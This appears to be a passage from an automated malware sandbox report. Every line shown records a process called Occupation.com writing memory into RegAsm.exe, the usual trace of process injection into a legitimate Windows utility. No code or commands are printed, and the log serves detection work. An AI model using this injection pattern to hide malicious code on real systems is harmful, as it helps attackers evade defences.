                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96238C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9623F0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962454
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9624B8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96251C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962580
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9625E4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962648
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9626AC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962710
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962774
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9627D8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96283C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9628A0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962904
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962968
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9629CC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962A30
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962A94
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962AF8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962B5C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962BC0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962C24
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962C88
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962CEC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962D50
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962DB4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962E18
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962E7C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962EE0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962F44
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962FA8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96300C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963070
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9630D4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963138
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96319C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963200
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963264
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9632C8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96332C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963390
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9633F4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963458
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9634BC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963520
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963584
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9635E8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96364C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9636B0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963714
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963778
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9637DC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963840
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9638A4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963908
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96396C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9639D0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963A34
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963A98
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963AFC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963B60
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963BC4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963C28
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963C8C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963CF0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963D54
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963DB8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963E1C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963E80
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963EE4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963F48
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963FAC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964010
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964074
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9640D8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96413C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9641A0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964204
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964268
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9642CC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964330
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964394
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9643F8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96445C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9644C0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964524
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964588
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9645EC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964650
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9646B4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964718
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96477C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9647E0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964844
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9648A8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96490C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964970
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9649D4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964A38
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964A9C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964B00
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964B64
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964BC8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964C2C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964C90
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964CF4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964D58
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964DBC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964E20
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964E84
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964EE8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964F4C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964FB0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965014
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965078
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9650DC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965140
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9651A4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965208
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96526C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9652D0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965334
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965398
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9653FC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965460
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9654C4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965528
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96558C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9655F0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965654
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9656B8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96571C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965780
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9657E4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965848
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9658AC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965910
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965974
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9659D8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965A3C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965AA0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965B04
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965B68
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965BCC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965C30
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965C94
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965CF8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965D5C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965DC0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965E24
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965E88
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965EEC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965F50
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965FB4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966018
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96607C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9660E0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966144
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9661A8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96620C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966270
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9662D4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966338
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96639C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B34C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B3B0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B414
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B478
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B4DC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B540
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B5A4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B608
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B66C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B6D0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B734
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B798
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B7FC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B860
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B8C4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B928
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B98C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96B9F0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BA54
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BAB8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BB1C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BB80
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BBE4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BC48
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BCAC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BD10
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BD74
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BDD8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BE3C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BEA0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BF04
